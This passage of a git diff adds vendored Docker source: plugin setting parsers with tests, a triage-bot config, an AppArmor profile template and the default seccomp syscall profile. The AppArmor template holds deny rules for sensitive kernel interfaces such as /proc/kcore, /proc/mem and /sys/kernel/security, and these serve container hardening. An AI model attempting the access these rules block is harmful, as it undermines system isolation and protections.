+ + return &s, nil +} diff --git a/vendor/github.com/docker/docker/plugin/v2/plugin_unsupported.go b/vendor/github.com/docker/docker/plugin/v2/plugin_unsupported.go new file mode 100644 index 0000000000..e60fb8311e --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/v2/plugin_unsupported.go @@ -0,0 +1,14 @@ +// +build !linux + +package v2 + +import ( + "errors" + + specs "github.com/opencontainers/runtime-spec/specs-go" +) + +// InitSpec creates an OCI spec from the plugin's config. +func (p *Plugin) InitSpec(execRoot string) (*specs.Spec, error) { + return nil, errors.New("not supported") +} diff --git a/vendor/github.com/docker/docker/plugin/v2/settable.go b/vendor/github.com/docker/docker/plugin/v2/settable.go new file mode 100644 index 0000000000..79c6befc24 --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/v2/settable.go @@ -0,0 +1,102 @@ +package v2 + +import ( + "errors" + "fmt" + "strings" +) + +type settable struct { + name string + field string + value string +} + +var ( + allowedSettableFieldsEnv = []string{"value"} + allowedSettableFieldsArgs = []string{"value"} + allowedSettableFieldsDevices = []string{"path"} + allowedSettableFieldsMounts = []string{"source"} + + errMultipleFields = errors.New("multiple fields are settable, one must be specified") + errInvalidFormat = errors.New("invalid format, must be [.][=]") +) + +func newSettables(args []string) ([]settable, error) { + sets := make([]settable, 0, len(args)) + for _, arg := range args { + set, err := newSettable(arg) + if err != nil { + return nil, err + } + sets = append(sets, set) + } + return sets, nil +} + +func newSettable(arg string) (settable, error) { + var set settable + if i := strings.Index(arg, "="); i == 0 { + return set, errInvalidFormat + } else if i < 0 { + set.name = arg + } else { + set.name = arg[:i] + set.value = arg[i+1:] + } + + if i := strings.LastIndex(set.name, "."); i > 0 { + set.field = set.name[i+1:] + set.name = arg[:i] + } + + return set, nil +} + +// 
prettyName return name.field if there is a field, otherwise name. +func (set *settable) prettyName() string { + if set.field != "" { + return fmt.Sprintf("%s.%s", set.name, set.field) + } + return set.name +} + +func (set *settable) isSettable(allowedSettableFields []string, settable []string) (bool, error) { + if set.field == "" { + if len(settable) == 1 { + // if field is not specified and there only one settable, default to it. + set.field = settable[0] + } else if len(settable) > 1 { + return false, errMultipleFields + } + } + + isAllowed := false + for _, allowedSettableField := range allowedSettableFields { + if set.field == allowedSettableField { + isAllowed = true + break + } + } + + if isAllowed { + for _, settableField := range settable { + if set.field == settableField { + return true, nil + } + } + } + + return false, nil +} + +func updateSettingsEnv(env *[]string, set *settable) { + for i, e := range *env { + if parts := strings.SplitN(e, "=", 2); parts[0] == set.name { + (*env)[i] = fmt.Sprintf("%s=%s", set.name, set.value) + return + } + } + + *env = append(*env, fmt.Sprintf("%s=%s", set.name, set.value)) +} diff --git a/vendor/github.com/docker/docker/plugin/v2/settable_test.go b/vendor/github.com/docker/docker/plugin/v2/settable_test.go new file mode 100644 index 0000000000..7183f3a679 --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/v2/settable_test.go @@ -0,0 +1,91 @@ +package v2 + +import ( + "reflect" + "testing" +) + +func TestNewSettable(t *testing.T) { + contexts := []struct { + arg string + name string + field string + value string + err error + }{ + {"name=value", "name", "", "value", nil}, + {"name", "name", "", "", nil}, + {"name.field=value", "name", "field", "value", nil}, + {"name.field", "name", "field", "", nil}, + {"=value", "", "", "", errInvalidFormat}, + {"=", "", "", "", errInvalidFormat}, + } + + for _, c := range contexts { + s, err := newSettable(c.arg) + if err != c.err { + t.Fatalf("expected error to be %v, got 
%v", c.err, err) + } + + if s.name != c.name { + t.Fatalf("expected name to be %q, got %q", c.name, s.name) + } + + if s.field != c.field { + t.Fatalf("expected field to be %q, got %q", c.field, s.field) + } + + if s.value != c.value { + t.Fatalf("expected value to be %q, got %q", c.value, s.value) + } + + } +} + +func TestIsSettable(t *testing.T) { + contexts := []struct { + allowedSettableFields []string + set settable + settable []string + result bool + err error + }{ + {allowedSettableFieldsEnv, settable{}, []string{}, false, nil}, + {allowedSettableFieldsEnv, settable{field: "value"}, []string{}, false, nil}, + {allowedSettableFieldsEnv, settable{}, []string{"value"}, true, nil}, + {allowedSettableFieldsEnv, settable{field: "value"}, []string{"value"}, true, nil}, + {allowedSettableFieldsEnv, settable{field: "foo"}, []string{"value"}, false, nil}, + {allowedSettableFieldsEnv, settable{field: "foo"}, []string{"foo"}, false, nil}, + {allowedSettableFieldsEnv, settable{}, []string{"value1", "value2"}, false, errMultipleFields}, + } + + for _, c := range contexts { + if res, err := c.set.isSettable(c.allowedSettableFields, c.settable); res != c.result { + t.Fatalf("expected result to be %t, got %t", c.result, res) + } else if err != c.err { + t.Fatalf("expected error to be %v, got %v", c.err, err) + } + } +} + +func TestUpdateSettinsEnv(t *testing.T) { + contexts := []struct { + env []string + set settable + newEnv []string + }{ + {[]string{}, settable{name: "DEBUG", value: "1"}, []string{"DEBUG=1"}}, + {[]string{"DEBUG=0"}, settable{name: "DEBUG", value: "1"}, []string{"DEBUG=1"}}, + {[]string{"FOO=0"}, settable{name: "DEBUG", value: "1"}, []string{"FOO=0", "DEBUG=1"}}, + {[]string{"FOO=0", "DEBUG=0"}, settable{name: "DEBUG", value: "1"}, []string{"FOO=0", "DEBUG=1"}}, + {[]string{"FOO=0", "DEBUG=0", "BAR=1"}, settable{name: "DEBUG", value: "1"}, []string{"FOO=0", "DEBUG=1", "BAR=1"}}, + } + + for _, c := range contexts { + updateSettingsEnv(&c.env, &c.set) + + 
if !reflect.DeepEqual(c.env, c.newEnv) { + t.Fatalf("expected env to be %q, got %q", c.newEnv, c.env) + } + } +} diff --git a/vendor/github.com/docker/docker/poule.yml b/vendor/github.com/docker/docker/poule.yml new file mode 100644 index 0000000000..61aab4551b --- /dev/null +++ b/vendor/github.com/docker/docker/poule.yml @@ -0,0 +1,88 @@ +# Add a "status/0-triage" to every newly opened pull request. +- triggers: + pull_request: [ opened ] + operations: + - type: label + settings: { + patterns: { + status/0-triage: [ ".*" ], + } + } + +# For every newly created or modified issue, assign label based on matching regexp using the `label` +# operation, as well as an Engine-specific version label using `version-label`. +- triggers: + issues: [ edited, opened, reopened ] + operations: + - type: label + settings: { + patterns: { + area/builder: [ "dockerfile", "docker build" ], + area/distribution: [ "docker login", "docker logout", "docker pull", "docker push", "docker search" ], + area/plugins: [ "docker plugin" ], + area/networking: [ "docker network", "ipvs", "vxlan" ], + area/runtime: [ "oci runtime error" ], + area/security/trust: [ "docker_content_trust" ], + area/swarm: [ "docker node", "docker service", "docker swarm" ], + platform/desktop: [ "docker for mac", "docker for windows" ], + platform/freebsd: [ "freebsd" ], + platform/windows: [ "nanoserver", "windowsservercore", "windows server" ], + } + } + - type: version-label + +# When a pull request is closed, attach it to the currently active milestone. +- triggers: + pull_request: [ closed ] + operations: + - type: version-milestone + +# Labeling a PR with `rebuild/` triggers a rebuild job for the associated +# configuration. The label is automatically removed after the rebuild is initiated. There's no such +# thing as "templating" in this configuration, so we need one operation for each type of +# configuration that can be triggered. 
+- triggers: + pull_request: [ labeled ] + operations: + - type: rebuild + settings: { + # When configurations are empty, the `rebuild` operation rebuilds all the currently + # known statuses for that pull request. + configurations: [], + label: "rebuild/*", + } + - type: rebuild + settings: { + configurations: [ arm ], + label: "rebuild/arm", + } + - type: rebuild + settings: { + configurations: [ experimental ], + label: "rebuild/experimental", + } + - type: rebuild + settings: { + configurations: [ janky ], + label: "rebuild/janky", + } + - type: rebuild + settings: { + configurations: [ userns ], + label: "rebuild/userns", + } + - type: rebuild + settings: { + configurations: [ vendor ], + label: "rebuild/vendor", + } + - type: rebuild + settings: { + configurations: [ win2lin ], + label: "rebuild/win2lin", + } + - type: rebuild + settings: { + configurations: [ windowsRS1 ], + label: "rebuild/windowsRS1", + } diff --git a/vendor/github.com/docker/docker/profiles/apparmor/apparmor.go b/vendor/github.com/docker/docker/profiles/apparmor/apparmor.go new file mode 100644 index 0000000000..5132ebe008 --- /dev/null +++ b/vendor/github.com/docker/docker/profiles/apparmor/apparmor.go @@ -0,0 +1,122 @@ +// +build linux + +package apparmor + +import ( + "bufio" + "io" + "io/ioutil" + "os" + "path" + "strings" + + "github.com/docker/docker/pkg/aaparser" + "github.com/docker/docker/utils/templates" +) + +var ( + // profileDirectory is the file store for apparmor profiles and macros. + profileDirectory = "/etc/apparmor.d" +) + +// profileData holds information about the given profile for generation. +type profileData struct { + // Name is profile name. + Name string + // Imports defines the apparmor functions to import, before defining the profile. + Imports []string + // InnerImports defines the apparmor functions to import in the profile. + InnerImports []string + // Version is the {major, minor, patch} version of apparmor_parser as a single number. 
+ Version int +} + +// generateDefault creates an apparmor profile from ProfileData. +func (p *profileData) generateDefault(out io.Writer) error { + compiled, err := templates.NewParse("apparmor_profile", baseTemplate) + if err != nil { + return err + } + + if macroExists("tunables/global") { + p.Imports = append(p.Imports, "#include ") + } else { + p.Imports = append(p.Imports, "@{PROC}=/proc/") + } + + if macroExists("abstractions/base") { + p.InnerImports = append(p.InnerImports, "#include ") + } + + ver, err := aaparser.GetVersion() + if err != nil { + return err + } + p.Version = ver + + if err := compiled.Execute(out, p); err != nil { + return err + } + return nil +} + +// macrosExists checks if the passed macro exists. +func macroExists(m string) bool { + _, err := os.Stat(path.Join(profileDirectory, m)) + return err == nil +} + +// InstallDefault generates a default profile in a temp directory determined by +// os.TempDir(), then loads the profile into the kernel using 'apparmor_parser'. +func InstallDefault(name string) error { + p := profileData{ + Name: name, + } + + // Install to a temporary directory. + f, err := ioutil.TempFile("", name) + if err != nil { + return err + } + profilePath := f.Name() + + defer f.Close() + defer os.Remove(profilePath) + + if err := p.generateDefault(f); err != nil { + f.Close() + return err + } + + if err := aaparser.LoadProfile(profilePath); err != nil { + return err + } + + return nil +} + +// IsLoaded checks if a profile with the given name has been loaded into the +// kernel. 
+func IsLoaded(name string) (bool, error) { + file, err := os.Open("/sys/kernel/security/apparmor/profiles") + if err != nil { + return false, err + } + defer file.Close() + + r := bufio.NewReader(file) + for { + p, err := r.ReadString('\n') + if err == io.EOF { + break + } + if err != nil { + return false, err + } + if strings.HasPrefix(p, name+" ") { + return true, nil + } + } + + return false, nil +} diff --git a/vendor/github.com/docker/docker/profiles/apparmor/template.go b/vendor/github.com/docker/docker/profiles/apparmor/template.go new file mode 100644 index 0000000000..c5ea4584de --- /dev/null +++ b/vendor/github.com/docker/docker/profiles/apparmor/template.go @@ -0,0 +1,46 @@ +// +build linux + +package apparmor + +// baseTemplate defines the default apparmor profile for containers. +const baseTemplate = ` +{{range $value := .Imports}} +{{$value}} +{{end}} + +profile {{.Name}} flags=(attach_disconnected,mediate_deleted) { +{{range $value := .InnerImports}} + {{$value}} +{{end}} + + network, + capability, + file, + umount, + + deny @{PROC}/* w, # deny write for all files directly in /proc (not in a subdir) + # deny write to files not in /proc//** or /proc/sys/** + deny @{PROC}/{[^1-9],[^1-9][^0-9],[^1-9s][^0-9y][^0-9s],[^1-9][^0-9][^0-9][^0-9]*}/** w, + deny @{PROC}/sys/[^k]** w, # deny /proc/sys except /proc/sys/k* (effectively /proc/sys/kernel) + deny @{PROC}/sys/kernel/{?,??,[^s][^h][^m]**} w, # deny everything except shm* in /proc/sys/kernel/ + deny @{PROC}/sysrq-trigger rwklx, + deny @{PROC}/mem rwklx, + deny @{PROC}/kmem rwklx, + deny @{PROC}/kcore rwklx, + + deny mount, + + deny /sys/[^f]*/** wklx, + deny /sys/f[^s]*/** wklx, + deny /sys/fs/[^c]*/** wklx, + deny /sys/fs/c[^g]*/** wklx, + deny /sys/fs/cg[^r]*/** wklx, + deny /sys/firmware/** rwklx, + deny /sys/kernel/security/** rwklx, + +{{if ge .Version 208095}} + # suppress ptrace denials when using 'docker ps' or using 'ps' inside a container + ptrace (trace,read) peer={{.Name}}, +{{end}} +} +` 
diff --git a/vendor/github.com/docker/docker/profiles/seccomp/default.json b/vendor/github.com/docker/docker/profiles/seccomp/default.json new file mode 100755 index 0000000000..ac129d3a31 --- /dev/null +++ b/vendor/github.com/docker/docker/profiles/seccomp/default.json @@ -0,0 +1,698 @@ +{ + "defaultAction": "SCMP_ACT_ERRNO", + "archMap": [ + { + "architecture": "SCMP_ARCH_X86_64", + "subArchitectures": [ + "SCMP_ARCH_X86", + "SCMP_ARCH_X32" + ] + }, + { + "architecture": "SCMP_ARCH_AARCH64", + "subArchitectures": [ + "SCMP_ARCH_ARM" + ] + }, + { + "architecture": "SCMP_ARCH_MIPS64", + "subArchitectures": [ + "SCMP_ARCH_MIPS", + "SCMP_ARCH_MIPS64N32" + ] + }, + { + "architecture": "SCMP_ARCH_MIPS64N32", + "subArchitectures": [ + "SCMP_ARCH_MIPS", + "SCMP_ARCH_MIPS64" + ] + }, + { + "architecture": "SCMP_ARCH_MIPSEL64", + "subArchitectures": [ + "SCMP_ARCH_MIPSEL", + "SCMP_ARCH_MIPSEL64N32" + ] + }, + { + "architecture": "SCMP_ARCH_MIPSEL64N32", + "subArchitectures": [ + "SCMP_ARCH_MIPSEL", + "SCMP_ARCH_MIPSEL64" + ] + }, + { + "architecture": "SCMP_ARCH_S390X", + "subArchitectures": [ + "SCMP_ARCH_S390" + ] + } + ], + "syscalls": [ + { + "names": [ + "accept", + "accept4", + "access", + "alarm", + "alarm", + "bind", + "brk", + "capget", + "capset", + "chdir", + "chmod", + "chown", + "chown32", + "clock_getres", + "clock_gettime", + "clock_nanosleep", + "close", + "connect", + "copy_file_range", + "creat", + "dup", + "dup2", + "dup3", + "epoll_create", + "epoll_create1", + "epoll_ctl", + "epoll_ctl_old", + "epoll_pwait", + "epoll_wait", + "epoll_wait_old", + "eventfd", + "eventfd2", + "execve", + "execveat", + "exit", + "exit_group", + "faccessat", + "fadvise64", + "fadvise64_64", + "fallocate", + "fanotify_mark", + "fchdir", + "fchmod", + "fchmodat", + "fchown", + "fchown32", + "fchownat", + "fcntl", + "fcntl64", + "fdatasync", + "fgetxattr", + "flistxattr", + "flock", + "fork", + "fremovexattr", + "fsetxattr", + "fstat", + "fstat64", + "fstatat64", + "fstatfs", + 
"fstatfs64", + "fsync", + "ftruncate", + "ftruncate64", + "futex", + "futimesat", + "getcpu", + "getcwd", + "getdents", + "getdents64", + "getegid", + "getegid32", + "geteuid", + "geteuid32", + "getgid", + "getgid32", + "getgroups", + "getgroups32", + "getitimer", + "getpeername", + "getpgid", + "getpgrp", + "getpid", + "getppid", + "getpriority", + "getrandom", + "getresgid", + "getresgid32", + "getresuid", + "getresuid32", + "getrlimit", + "get_robust_list", + "getrusage", + "getsid", + "getsockname", + "getsockopt", + "get_thread_area", + "gettid", + "gettimeofday", + "getuid", + "getuid32", + "getxattr", + "inotify_add_watch", + "inotify_init", + "inotify_init1", + "inotify_rm_watch", + "io_cancel", + "ioctl", + "io_destroy", + "io_getevents", + "ioprio_get", + "ioprio_set", + "io_setup", + "io_submit", + "ipc", + "kill", + "lchown", + "lchown32", + "lgetxattr", + "link", + "linkat", + "listen", + "listxattr", + "llistxattr", + "_llseek", + "lremovexattr", + "lseek", + "lsetxattr", + "lstat", + "lstat64", + "madvise", + "memfd_create", + "mincore", + "mkdir", + "mkdirat", + "mknod", + "mknodat", + "mlock", + "mlock2", + "mlockall", + "mmap", + "mmap2", + "mprotect", + "mq_getsetattr", + "mq_notify", + "mq_open", + "mq_timedreceive", + "mq_timedsend", + "mq_unlink", + "mremap", + "msgctl", + "msgget", + "msgrcv", + "msgsnd", + "msync", + "munlock", + "munlockall", + "munmap", + "nanosleep", + "newfstatat", + "_newselect", + "open", + "openat", + "pause", + "pipe", + "pipe2", + "poll", + "ppoll", + "prctl", + "pread64", + "preadv", + "prlimit64", + "pselect6", + "pwrite64", + "pwritev", + "read", + "readahead", + "readlink", + "readlinkat", + "readv", + "recv", + "recvfrom", + "recvmmsg", + "recvmsg", + "remap_file_pages", + "removexattr", + "rename", + "renameat", + "renameat2", + "restart_syscall", + "rmdir", + "rt_sigaction", + "rt_sigpending", + "rt_sigprocmask", + "rt_sigqueueinfo", + "rt_sigreturn", + "rt_sigsuspend", + "rt_sigtimedwait", + 
"rt_tgsigqueueinfo", + "sched_getaffinity", + "sched_getattr", + "sched_getparam", + "sched_get_priority_max", + "sched_get_priority_min", + "sched_getscheduler", + "sched_rr_get_interval", + "sched_setaffinity", + "sched_setattr", + "sched_setparam", + "sched_setscheduler", + "sched_yield", + "seccomp", + "select", + "semctl", + "semget", + "semop", + "semtimedop", + "send", + "sendfile", + "sendfile64", + "sendmmsg", + "sendmsg", + "sendto", + "setfsgid", + "setfsgid32", + "setfsuid", + "setfsuid32", + "setgid", + "setgid32", + "setgroups", + "setgroups32", + "setitimer", + "setpgid", + "setpriority", + "setregid", + "setregid32", + "setresgid", + "setresgid32", + "setresuid", + "setresuid32", + "setreuid", + "setreuid32", + "setrlimit", + "set_robust_list", + "setsid", + "setsockopt", + "set_thread_area", + "set_tid_address", + "setuid", + "setuid32", + "setxattr", + "shmat", + "shmctl", + "shmdt", + "shmget", + "shutdown", + "sigaltstack", + "signalfd", + "signalfd4", + "sigreturn", + "socket", + "socketcall", + "socketpair", + "splice", + "stat", + "stat64", + "statfs", + "statfs64", + "symlink", + "symlinkat", + "sync", + "sync_file_range", + "syncfs", + "sysinfo", + "syslog", + "tee", + "tgkill", + "time", + "timer_create", + "timer_delete", + "timerfd_create", + "timerfd_gettime", + "timerfd_settime", + "timer_getoverrun", + "timer_gettime", + "timer_settime", + "times", + "tkill", + "truncate", + "truncate64", + "ugetrlimit", + "umask", + "uname", + "unlink", + "unlinkat", + "utime", + "utimensat", + "utimes", + "vfork", + "vmsplice", + "wait4", + "waitid", + "waitpid", + "write", + "writev" + ], + "action": "SCMP_ACT_ALLOW", + "args": [], + "comment": "", + "includes": {}, + "excludes": {} + }, + { + "names": [ + "personality" + ], + "action": "SCMP_ACT_ALLOW", + "args": [ + { + "index": 0, + "value": 0, + "valueTwo": 0, + "op": "SCMP_CMP_EQ" + } + ], + "comment": "", + "includes": {}, + "excludes": {} + }, + { + "names": [ + "personality" + ], + 
"action": "SCMP_ACT_ALLOW", + "args": [ + { + "index": 0, + "value": 8, + "valueTwo": 0, + "op": "SCMP_CMP_EQ" + } + ], + "comment": "", + "includes": {}, + "excludes": {} + }, + { + "names": [ + "personality" + ], + "action": "SCMP_ACT_ALLOW", + "args": [ + { + "index": 0, + "value": 4294967295, + "valueTwo": 0, + "op": "SCMP_CMP_EQ" + } + ], + "comment": "", + "includes": {}, + "excludes": {} + }, + { + "names": [ + "arm_fadvise64_64", + "arm_sync_file_range", + "breakpoint", + "cacheflush", + "set_tls" + ], + "action": "SCMP_ACT_ALLOW", + "args": [], + "comment": "", + "includes": { + "arches": [ + "arm", + "arm64" + ] + }, + "excludes": {} + }, + { + "names": [ + "arch_prctl" + ], + "action": "SCMP_ACT_ALLOW", + "args": [], + "comment": "", + "includes": { + "arches": [ + "amd64", + "x32" + ] + }, + "excludes": {} + }, + { + "names": [ + "modify_ldt" + ], + "action": "SCMP_ACT_ALLOW", + "args": [], + "comment": "", + "includes": { + "arches": [ + "amd64", + "x32", + "x86" + ] + }, + "excludes": {} + }, + { + "names": [ + "s390_pci_mmio_read", + "s390_pci_mmio_write", + "s390_runtime_instr" + ], + "action": "SCMP_ACT_ALLOW", + "args": [], + "comment": "", + "includes": { + "arches": [ + "s390", + "s390x" + ] + }, + "excludes": {} + }, + { + "names": [ + "open_by_handle_at" + ], + "action": "SCMP_ACT_ALLOW", + "args": [], + "comment": "", + "includes": { + "caps": [ + "CAP_DAC_READ_SEARCH" + ] + }, + "excludes": {} + }, + { + "names": [ + "bpf", + "clone", + "fanotify_init", + "lookup_dcookie", + "mount", + "name_to_handle_at", + "perf_event_open", + "setdomainname", + "sethostname", + "setns", + "umount", + "umount2", + "unshare" + ], + "action": "SCMP_ACT_ALLOW", + "args": [], + "comment": "", + "includes": { + "caps": [ + "CAP_SYS_ADMIN" + ] + }, + "excludes": {} + }, + { + "names": [ + "clone" + ], + "action": "SCMP_ACT_ALLOW", + "args": [ + { + "index": 0, + "value": 2080505856, + "valueTwo": 0, + "op": "SCMP_CMP_MASKED_EQ" + } + ], + "comment": "", + 
"includes": {}, + "excludes": { + "caps": [ + "CAP_SYS_ADMIN" + ], + "arches": [ + "s390", + "s390x" + ] + } + }, + { + "names": [ + "clone" + ], + "action": "SCMP_ACT_ALLOW", + "args": [ + { + "index": 1, + "value": 2080505856, + "valueTwo": 0, + "op": "SCMP_CMP_MASKED_EQ" + } + ], + "comment": "s390 parameter ordering for clone is different", + "includes": { + "arches": [ + "s390", + "s390x" + ] + }, + "excludes": { + "caps": [ + "CAP_SYS_ADMIN" + ] + } + }, + { + "names": [ + "reboot" + ], + "action": "SCMP_ACT_ALLOW", + "args": [], + "comment": "", + "includes": { + "caps": [ + "CAP_SYS_BOOT" + ] + }, + "excludes": {} + }, + { + "names": [ + "chroot" + ], + "action": "SCMP_ACT_ALLOW", + "args": [], + "comment": "", + "includes": { + "caps": [ + "CAP_SYS_CHROOT" + ] + }, + "excludes": {} + }, + { + "names": [ + "delete_module", + "init_module", + "finit_module", + "query_module" + ], + "action": "SCMP_ACT_ALLOW", + "args": [], + "comment": "", + "includes": { + "caps": [ + "CAP_SYS_MODULE" + ] + }, + "excludes": {} + }, + { + "names": [ + "acct" + ], + "action": "SCMP_ACT_ALLOW", + "args": [], + "comment": "", + "includes": { + "caps": [ + "CAP_SYS_PACCT" + ] + }, + "excludes": {} + }, + { + "names": [ + "kcmp", + "process_vm_readv", + "process_vm_writev", + "ptrace" + ], + "action": "SCMP_ACT_ALLOW", + "args": [], + "comment": "", + "includes": { + "caps": [ + "CAP_SYS_PTRACE" + ] + }, + "excludes": {} + }, + { + "names": [ + "iopl", + "ioperm" + ], + "action": "SCMP_ACT_ALLOW", + "args": [], + "comment": "", + "includes": { + "caps": [ + "CAP_SYS_RAWIO" + ] + }, + "excludes": {} + }, + { + "names": [ + "settimeofday", + "stime", + "adjtimex" + ], + "action": "SCMP_ACT_ALLOW", + "args": [], + "comment": "", + "includes": { + "caps": [ + "CAP_SYS_TIME" + ] + }, + "excludes": {} + }, + { + "names": [ + "vhangup" + ], + "action": "SCMP_ACT_ALLOW", + "args": [], + "comment": "", + "includes": { + "caps": [ + "CAP_SYS_TTY_CONFIG" + ] + }, + "excludes": {} + } + ] +} 
\ No newline at end of file diff --git a/vendor/github.com/docker/docker/profiles/seccomp/fixtures/example.json b/vendor/github.com/docker/docker/profiles/seccomp/fixtures/example.json new file mode 100755 index 0000000000..674ca50fd9 --- /dev/null +++ b/vendor/github.com/docker/docker/profiles/seccomp/fixtures/example.json @@ -0,0 +1,27 @@ +{ + "defaultAction": "SCMP_ACT_ERRNO", + "syscalls": [ + { + "name": "clone", + "action": "SCMP_ACT_ALLOW", + "args": [ + { + "index": 0, + "value": 2080505856, + "valueTwo": 0, + "op": "SCMP_CMP_MASKED_EQ" + } + ] + }, + { + "name": "open", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "close", + "action": "SCMP_ACT_ALLOW", + "args": [] + } + ] +} diff --git a/vendor/github.com/docker/docker/profiles/seccomp/generate.go b/vendor/github.com/docker/docker/profiles/seccomp/generate.go new file mode 100644 index 0000000000..32f22bb375 --- /dev/null +++ b/vendor/github.com/docker/docker/profiles/seccomp/generate.go @@ -0,0 +1,32 @@ +// +build ignore + +package main + +import ( + "encoding/json" + "io/ioutil" + "os" + "path/filepath" + + "github.com/docker/docker/profiles/seccomp" +) + +// saves the default seccomp profile as a json file so people can use it as a +// base for their own custom profiles +func main() { + wd, err := os.Getwd() + if err != nil { + panic(err) + } + f := filepath.Join(wd, "default.json") + + // write the default profile to the file + b, err := json.MarshalIndent(seccomp.DefaultProfile(), "", "\t") + if err != nil { + panic(err) + } + + if err := ioutil.WriteFile(f, b, 0644); err != nil { + panic(err) + } +} diff --git a/vendor/github.com/docker/docker/profiles/seccomp/seccomp.go b/vendor/github.com/docker/docker/profiles/seccomp/seccomp.go new file mode 100644 index 0000000000..a54ef50a8b --- /dev/null +++ b/vendor/github.com/docker/docker/profiles/seccomp/seccomp.go @@ -0,0 +1,150 @@ +// +build linux + +package seccomp + +import ( + "encoding/json" + "errors" + "fmt" + + 
"github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/stringutils" + "github.com/opencontainers/runtime-spec/specs-go" + libseccomp "github.com/seccomp/libseccomp-golang" +) + +//go:generate go run -tags 'seccomp' generate.go + +// GetDefaultProfile returns the default seccomp profile. +func GetDefaultProfile(rs *specs.Spec) (*specs.Seccomp, error) { + return setupSeccomp(DefaultProfile(), rs) +} + +// LoadProfile takes a file path and decodes the seccomp profile. +func LoadProfile(body string, rs *specs.Spec) (*specs.Seccomp, error) { + var config types.Seccomp + if err := json.Unmarshal([]byte(body), &config); err != nil { + return nil, fmt.Errorf("Decoding seccomp profile failed: %v", err) + } + return setupSeccomp(&config, rs) +} + +var nativeToSeccomp = map[string]types.Arch{ + "amd64": types.ArchX86_64, + "arm64": types.ArchAARCH64, + "mips64": types.ArchMIPS64, + "mips64n32": types.ArchMIPS64N32, + "mipsel64": types.ArchMIPSEL64, + "mipsel64n32": types.ArchMIPSEL64N32, + "s390x": types.ArchS390X, +} + +func setupSeccomp(config *types.Seccomp, rs *specs.Spec) (*specs.Seccomp, error) { + if config == nil { + return nil, nil + } + + // No default action specified, no syscalls listed, assume seccomp disabled + if config.DefaultAction == "" && len(config.Syscalls) == 0 { + return nil, nil + } + + newConfig := &specs.Seccomp{} + + var arch string + var native, err = libseccomp.GetNativeArch() + if err == nil { + arch = native.String() + } + + if len(config.Architectures) != 0 && len(config.ArchMap) != 0 { + return nil, errors.New("'architectures' and 'archMap' were specified in the seccomp profile, use either 'architectures' or 'archMap'") + } + + // if config.Architectures == 0 then libseccomp will figure out the architecture to use + if len(config.Architectures) != 0 { + for _, a := range config.Architectures { + newConfig.Architectures = append(newConfig.Architectures, specs.Arch(a)) + } + } + + if len(config.ArchMap) != 0 { + for _, a := range 
config.ArchMap { + seccompArch, ok := nativeToSeccomp[arch] + if ok { + if a.Arch == seccompArch { + newConfig.Architectures = append(newConfig.Architectures, specs.Arch(a.Arch)) + for _, sa := range a.SubArches { + newConfig.Architectures = append(newConfig.Architectures, specs.Arch(sa)) + } + break + } + } + } + } + + newConfig.DefaultAction = specs.Action(config.DefaultAction) + +Loop: + // Loop through all syscall blocks and convert them to libcontainer format after filtering them + for _, call := range config.Syscalls { + if len(call.Excludes.Arches) > 0 { + if stringutils.InSlice(call.Excludes.Arches, arch) { + continue Loop + } + } + if len(call.Excludes.Caps) > 0 { + for _, c := range call.Excludes.Caps { + if stringutils.InSlice(rs.Process.Capabilities, c) { + continue Loop + } + } + } + if len(call.Includes.Arches) > 0 { + if !stringutils.InSlice(call.Includes.Arches, arch) { + continue Loop + } + } + if len(call.Includes.Caps) > 0 { + for _, c := range call.Includes.Caps { + if !stringutils.InSlice(rs.Process.Capabilities, c) { + continue Loop + } + } + } + + if call.Name != "" && len(call.Names) != 0 { + return nil, errors.New("'name' and 'names' were specified in the seccomp profile, use either 'name' or 'names'") + } + + if call.Name != "" { + newConfig.Syscalls = append(newConfig.Syscalls, createSpecsSyscall(call.Name, call.Action, call.Args)) + } + + for _, n := range call.Names { + newConfig.Syscalls = append(newConfig.Syscalls, createSpecsSyscall(n, call.Action, call.Args)) + } + } + + return newConfig, nil +} + +func createSpecsSyscall(name string, action types.Action, args []*types.Arg) specs.Syscall { + newCall := specs.Syscall{ + Name: name, + Action: specs.Action(action), + } + + // Loop through all the arguments of the syscall and convert them + for _, arg := range args { + newArg := specs.Arg{ + Index: arg.Index, + Value: arg.Value, + ValueTwo: arg.ValueTwo, + Op: specs.Operator(arg.Op), + } + + newCall.Args = append(newCall.Args, newArg) + 
} + return newCall +} diff --git a/vendor/github.com/docker/docker/profiles/seccomp/seccomp_default.go b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_default.go new file mode 100644 index 0000000000..b84de820b7 --- /dev/null +++ b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_default.go @@ -0,0 +1,604 @@ +// +build linux,seccomp + +package seccomp + +import ( + "syscall" + + "github.com/docker/docker/api/types" +) + +func arches() []types.Architecture { + return []types.Architecture{ + { + Arch: types.ArchX86_64, + SubArches: []types.Arch{types.ArchX86, types.ArchX32}, + }, + { + Arch: types.ArchAARCH64, + SubArches: []types.Arch{types.ArchARM}, + }, + { + Arch: types.ArchMIPS64, + SubArches: []types.Arch{types.ArchMIPS, types.ArchMIPS64N32}, + }, + { + Arch: types.ArchMIPS64N32, + SubArches: []types.Arch{types.ArchMIPS, types.ArchMIPS64}, + }, + { + Arch: types.ArchMIPSEL64, + SubArches: []types.Arch{types.ArchMIPSEL, types.ArchMIPSEL64N32}, + }, + { + Arch: types.ArchMIPSEL64N32, + SubArches: []types.Arch{types.ArchMIPSEL, types.ArchMIPSEL64}, + }, + { + Arch: types.ArchS390X, + SubArches: []types.Arch{types.ArchS390}, + }, + } +} + +// DefaultProfile defines the whitelist for the default seccomp profile. 
